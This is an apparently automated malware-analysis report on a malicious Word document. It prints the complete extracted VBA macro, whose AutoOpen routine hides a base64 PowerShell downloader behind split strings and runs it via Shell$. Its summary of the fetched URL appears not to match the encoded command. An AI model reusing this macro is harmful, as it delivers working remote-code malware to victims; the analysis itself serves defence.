Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6cb806c861e15bfb…

MALICIOUS

Office (OLE)

185.5 KB Created: 2018-02-07 20:31:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: ec799a4a4998f122b91cfd35bdf4206b SHA-1: a8b89b076728a12a00a3b4d08e0ebee07d39f85a SHA-256: 6cb806c861e15bfb4c377522373b0634e4088824a1461a27d02d899dee5383f0
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute obfuscated PowerShell commands. Specifically, it reconstructs the command 'Invoke-webrequest https://uspra5140.com/a' which is likely used to download and execute a second-stage payload. The use of obfuscated PowerShell and the AutoOpen macro are common techniques for initial compromise via malicious documents.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        FQ_MJ = FS_KF & " -e " & BK_ND
        Shell$ FQ_MJ
    End Sub
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        FQ_MJ = FS_KF & " -e " & BK_ND
        Shell$ FQ_MJ
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "StockUpdate"
    Sub AutoOpen()
        Dim CL_MD As String
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5177 bytes
SHA-256: b841dff21c3a6df34059fa81d11530bbdd30fe30daaf9bef61d6a8b842dde4e2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "StockUpdate"
Sub AutoOpen()
    Dim CL_MD As String
    CL_MD = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
    Dim AK_KG As String
    AK_KG = "QAeAApAHsAcgBlAHQAdQBy"
    Dim IO_SE As String
    IO_SE = "AG4AIABbAFMAeQBzA"
    Dim IT_RF As String
    IT_RF = "HQAZQBtAC4AVABlAHgAdAAuAEUA"
    Dim FT_KB As String
    FT_KB = "bgBjAG8AZABpAG4AZwBdADoAOgBVAFQA"
    BK_ND = BK_ND & CL_MD & AK_KG & IO_SE & IT_RF & FT_KB
    Dim JK_KC As String
    JK_KC = "RgA4AC4ARw"
    Dim IQ_TG As String
    IQ_TG = "BlAHQAUwB0AHIAaQBuAGcAKAB"
    Dim IK_KG As String
    IK_KG = "bAFMAeQ"
    Dim HL_RJ As String
    HL_RJ = "BzAHQAZQBtAC4AQwBvAG4AdgBlA"
    Dim AK_NF As String
    AK_NF = "HIAdABdADoAOgBGAHIAbwBtAEIAYQBzA"
    BK_ND = BK_ND & JK_KC & IQ_TG & IK_KG & HL_RJ & AK_NF
    Dim CT_RD As String
    CT_RD = "GUANgA0AF"
    Dim BQ_PD As String
    BQ_PD = "MAdAByAGkA"
    Dim IK_RF As String
    IK_RF = "bgBnACgA"
    Dim ER_RB As String
    ER_RB = "JAB4ACkAKQB9ADsAaQBlAHg"
    Dim BL_KD As String
    BL_KD = "AIAAkACgAY"
    BK_ND = BK_ND & CT_RD & BQ_PD & IK_RF & ER_RB & BL_KD
    Dim AL_RJ As String
    AL_RJ = "QAgACQAKAAkACgAJAAoAGkAbgB2"
    Dim AK_TH As String
    AK_TH = "AG8AawBlAC0AdwBlAGIA"
    Dim GT_RJ As String
    GT_RJ = "cgBlAHEAdQBlAHMAdAAgACcAaAB0AHQ"
    Dim EK_QF As String
    EK_QF = "AcABzADoALwAvAHUA"
    Dim AQ_QE As String
    AQ_QE = "cwBwAHIAZAA1ADEANQAwAG"
    BK_ND = BK_ND & AL_RJ & AK_TH & GT_RJ & EK_QF & AQ_QE
    Dim FN_RD As String
    FN_RD = "MAZQBuAH"
    Dim CQ_MI As String
    CQ_MI = "QAcgBhAG"
    Dim HL_KG As String
    HL_KG = "wALgB0AGEAYgBsAGUALgBjAG8AcgB"
    Dim HO_SA As String
    HO_SA = "lAC4AdwBpAG4AZABvAHcAcwAuAG4A"
    Dim IL_RA As String
    IL_RA = "ZQB0AC8AdwBhAHIAZQBoAG8"
    BK_ND = BK_ND & FN_RD & CQ_MI & HL_KG & HO_SA & IL_RA
    Dim EM_LG As String
    EM_LG = "AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD"
    Dim BN_RB As String
    BN_RB = "0AUABhAHIAdA"
    Dim BS_LF As String
    BS_LF = "BpAHQAaQBvAG"
    Dim AL_PB As String
    AL_PB = "4ASwBlAHkAJQAyADAAZQBxACUAMgAwAC"
    Dim IK_PH As String
    IK_PH = "UAMgA3AHMAdAB"
    BK_ND = BK_ND & EM_LG & BN_RB & BS_LF & AL_PB & IK_PH
    Dim GP_OJ As String
    GP_OJ = "hAGcAZQAlADIANw"
    Dim IS_LJ As String
    IS_LJ = "AmACQAUwBlAGwAZQBjAHQAPQBkAGEAdA"
    Dim JK_SF As String
    JK_SF = "BhACYAcwB2AD0AMgAwADEANwAtADAANAAtA"
    Dim BN_QA As String
    BN_QA = "DEANwAmAHMAcwA9AGI"
    Dim BL_LC As String
    BL_LC = "AZgBxAHQAJgBz"
    BK_ND = BK_ND & GP_OJ & IS_LJ & JK_SF & BN_QA & BL_LC
    Dim CQ_SC As String
    CQ_SC = "AHIAdAA"
    Dim EM_QJ As String
    EM_QJ = "9AHMAYwBvACYAcwBwAD0Ac"
    Dim EQ_SJ As String
    EQ_SJ = "gB3AGQAbABhAGMAdQBwACYAcwBlAD0"
    Dim IP_OI As String
    IP_OI = "AMgAwADEANwAtADEAMA"
    Dim HN_PF As String
    HN_PF = "AtADAANgB"
    BK_ND = BK_ND & CQ_SC & EM_QJ & EQ_SJ & IP_OI & HN_PF
    Dim CP_OI As String
    CP_OI = "UADIAMgA6ADQAMQA6"
    Dim HM_NB As String
    HM_NB = "ADEAMgBaAC"
    Dim BK_PG As String
    BK_PG = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADI"
    Dim AP_MA As String
    AP_MA = "AOABUADE"
    Dim GO_NE As String
    GO_NE = "ANAA6ADQAM"
    BK_ND = BK_ND & CP_OI & HM_NB & BK_PG & AP_MA & GO_NE
    Dim EK_NE As String
    EK_NE = "QA6ADEA"
    Dim AM_ME As String
    AM_ME = "MgBaACYAcwBwAHIAPQ"
    Dim GK_PI As String
    GK_PI = "BoAHQAdABwAHMAJgBzAGkAZwA9AHQAe"
    Dim DQ_PG As String
    DQ_PG = "gBQADcAY"
    Dim IL_NJ As String
    IL_NJ = "wA4AHgAWgBoAHIAMQBzAGIAdgB4AD"
    BK_ND = BK_ND & EK_NE & AM_ME & GK_PI & DQ_PG & IL_NJ
    Dim BO_KB As String
    BO_KB = "kAZgBKAFMAdwBK"
    Dim JQ_MH As String
    JQ_MH = "AEkAUwBIAEIANgB"
    Dim ET_KF As String
    ET_KF = "lADgAJQAyAEIAbgBs"
    Dim HS_RC As String
    HS_RC = "AGwAdQBuAEgAaQBmAEwAMwBoAHgA"
    Dim HS_QE As String
    HS_QE = "agA0ACUAMwBEACcAIAAtAEgAZQBhAG"
    BK_ND = BK_ND & BO_KB & JQ_MH & ET_KF & HS_RC & HS_QE
    Dim FK_TE As String
    FK_TE = "QAZQByAHMAIABAAHsAJwBBAGMAYwBlAH"
    Dim JT_KI As String
    JT_KI = "AAdAAnAD0AJwBBAHAAcABsAGkAYwBh"
    Dim AQ_OB As String
    AQ_OB = "AHQAaQBvA"
    Dim DO_OD As String
    DO_OD = "G4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4A"
    Dim EN_NB As String
    EN_NB = "dABlAG4AdAAgAHwAIABD"
    BK_ND = BK_ND & FK_TE & JT_KI & AQ_OB & DO_OD & EN_NB
    Dim HT_KI As String
    HT_KI = "AG8AbgB2AGUAcgB0AEYAcgBvAG"
    Dim IN_KF As String
    IN_KF = "0ALQBKAHMAbwBuACkALgB2AGEAbAB1AGU"
    BK_ND = BK_ND & HT_KI & IN_KF
    Dim EP_SE As String
    EP_SE = "ALgBkAGEAdABh"
    BK_ND = BK_ND & EP_SE
    Dim IM_LJ As String
    IM_LJ = "ACkAKQA="
    BK_ND = BK_ND & IM_LJ
    FS_KF = "p" + "O" + "w" + "E" + "r" + "S" + "h" + "E" + "l" + "L"
    FQ_MJ = FS_KF & " -e " & BK_ND
    Shell$ FQ_MJ
End Sub